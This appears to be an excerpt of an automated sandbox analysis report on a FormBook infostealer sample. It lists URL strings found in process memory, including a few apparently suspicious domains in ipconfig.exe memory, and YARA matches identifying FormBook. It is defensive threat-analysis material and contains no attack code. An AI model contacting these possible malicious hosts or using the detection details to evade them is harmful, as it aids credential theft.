          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2150295147.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000002.2345242648.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmpString found in binary or memory: http://www.bigdillenergy.com
          Source: ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmpString found in binary or memory: http://www.bigdillenergy.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmpString found in binary or memory: http://www.gregoryrecommends.com/nopage_error.html
          Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2142382696.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2156461233.00000000082FD000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000002.2344900431.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerp
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
